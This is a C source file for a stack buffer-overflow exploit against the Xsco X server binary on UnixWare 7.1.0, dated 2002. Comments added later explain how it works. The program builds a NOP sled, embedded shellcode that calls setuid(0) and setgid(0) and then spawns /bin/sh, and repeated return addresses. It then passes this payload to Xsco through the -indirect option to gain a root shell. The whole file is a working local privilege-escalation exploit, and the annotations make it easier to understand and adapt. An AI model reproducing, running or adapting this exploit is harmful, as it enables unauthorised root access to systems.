/*
 *  Unixware 7.1.0 xploit for Xsco
 *
 *  By: Fermín J. Serna <fjserna@ngsec.com>
 *      Next Generation Security Technologies
 *      http://www.ngsec.com
 *
 *  This is not the overflow discovered by K2 of ADM 
 *
 *  Madrid 01/01/2002
 *
 */

#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

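/*
 * Payload parameters.  SIZE is parenthesised so it can be used safely in
 * any expression (the original "2064+1" would have mis-expanded in e.g.
 * SIZE*2); the buffer is 2064 bytes of payload plus the terminating NUL.
 */
#define SIZE (2064 + 1)
/* x86 one-byte NOP used to fill the sled in front of the shellcode. */
#define NOP 0x90
/* Added to the exploit's own stack pointer to form the return address;
 * presumably tuned so it lands inside the sled of the target process. */
#define OFFSET 500
/* How many copies of the return address are appended after the shellcode. */
#define NUM_ADDR 8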

/*
 * SCO/UnixWare i386 shellcode (credited to zhodiac@softhome.net).
 *
 * It contains no NUL byte, so it survives being passed through execl() as a
 * C string; every place that needs a zero at run time is a 0xaa placeholder
 * that the code patches itself.  Decoding the bytes:
 *
 *   jmp / call / pop %esi          -> %esi = address of the data block below
 *   mov ..., [esi+7]/[esi+0xc]/[esi+0x11] = 0, [esi]/[esi+4] = '/'
 *                                  -> turns "ZbinZsh" into "/bin/sh\0" and
 *                                     the placeholders into "lcall $0x7,$0x0; ret"
 *                                     (the SysV i386 system-call gate)
 *   eax=0x17, 0x2e, 0x3b with zero args -> setuid(0); setgid(0);
 *                                     execve("/bin/sh", NULL, NULL)
 *
 * The call numbers match SVR4 i386 numbering; NOTE(review): verify them
 * against the target release before reusing this elsewhere.
 */
char shellcode[]= /* zhodiac@softhome.net */
"\xeb\x17\x5e\x31\xdb\x88\x5e\x07\x89\x5e\x0c\x88\x5e\x11\xb3\x2e" /* jmp; pop esi; xor ebx; patch zeros; bl=0x2e */
"\xfe\xc3\x88\x1e\x88\x5e\x04\xeb\x18\xe8\xe4\xff\xff\xff\x5a\x62" /* bl++ ('/'); patch [esi],[esi+4]; jmp; call; "Zb" */
"\x69\x6e\x5a\x73\x68\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa" /* "inZsh" + placeholders; lcall $7,$0 skeleton */
"\xc3\x31\xdb\x31\xc0\x53\xb0\x17\xe8\xec\xff\xff\xff\x53\xb0\x2e" /* ret; setuid(0) via gate; prepare setgid(0) */
"\xe8\xe4\xff\xff\xff\xb0\x3b\x53\x53\x56\x56\xeb\xdc";             /* setgid(0); execve(esi, 0, 0) via gate */

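/*
 * Return the current stack pointer.
 *
 * The original relied on "movl %esp,%eax" leaving the value in the return
 * register of a function with no return statement, which is undefined
 * behaviour and breaks under optimisation.  The value is now captured
 * through an asm output operand and returned explicitly.  The exploit
 * itself only makes sense on the 32-bit target, but the other branches
 * keep the helper compilable and meaningful on the build host.
 */
long get_esp(void) {
    long sp;
#if defined(__i386__)
    __asm__ __volatile__("movl %%esp,%0" : "=r"(sp));
#elif defined(__x86_64__)
    __asm__ __volatile__("movq %%rsp,%0" : "=r"(sp));
#else
    sp = (long)__builtin_frame_address(0);
#endif
    return sp;
}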

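/*
 * Build the overflow payload and exec Xsco with it as the value of the
 * "-indirect" option.  Payload layout, from the start of buffer:
 *
 *     [ NOP sled | shellcode | NUM_ADDR x 32-bit return address | '\0' ]
 *
 * The return address is this process's stack pointer plus OFFSET (the
 * target presumably starts with a comparable stack, so the sled should be
 * reachable from there).  Addresses are written as 32-bit slots because the
 * target ABI is 32-bit; the original used unsigned long, which is 8 bytes
 * on LP64 hosts and would overrun buffer.  They are copied with memcpy so
 * no unaligned or aliasing store is made through a cast pointer.
 *
 * The buffer travels through execl() as a C string, so a NUL byte anywhere
 * in the return address silently truncates it; that case is detected and
 * reported before exec.  On success execl() does not return; the function
 * returns 1 if the payload cannot be built or the exec fails.
 */
int main(int argc, char **argv) {
    char buffer[SIZE];
    unsigned char *p = (unsigned char *)buffer;
    size_t sc_len = strlen(shellcode);
    size_t addr_bytes = (size_t)NUM_ADDR * sizeof(uint32_t);
    size_t sled_len;
    uint32_t ret_addr = (uint32_t)(get_esp() + OFFSET);
    int i;

    (void)argc;
    (void)argv;

    printf("Xsco xploit for Unixware 7.1.0 by Fermín J. Serna <fjserna@ngsec.com>\n");
    printf("Next Generation Security Technologies http://www.ngsec.com\n");

    /* Guard the size arithmetic: everything must fit plus the final NUL. */
    if (sc_len + addr_bytes + 1 > sizeof(buffer)) {
        fprintf(stderr, "shellcode does not fit in a %lu byte buffer\n",
                (unsigned long)sizeof(buffer));
        return 1;
    }
    sled_len = sizeof(buffer) - sc_len - addr_bytes - 1;

    memset(p, NOP, sled_len);
    p += sled_len;
    memcpy(p, shellcode, sc_len);
    p += sc_len;
    for (i = 0; i < NUM_ADDR; i++) {
        memcpy(p, &ret_addr, sizeof(ret_addr));
        p += sizeof(ret_addr);
    }
    *p = '\0';

    printf("Len: %lu Return address: %#lx\n",
           (unsigned long)strlen(buffer), (unsigned long)ret_addr);
    if (strlen(buffer) != sizeof(buffer) - 1) {
        fprintf(stderr,
                "warning: return address contains a NUL byte; "
                "payload is truncated to %lu bytes (try another OFFSET)\n",
                (unsigned long)strlen(buffer));
    }

    /* The sentinel must be a (char *) NULL for the variadic execl(). */
    execl("/usr/X/bin/Xsco", "Xsco", "-indirect", buffer, (char *)NULL);
    perror("execl");
    return 1;
}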


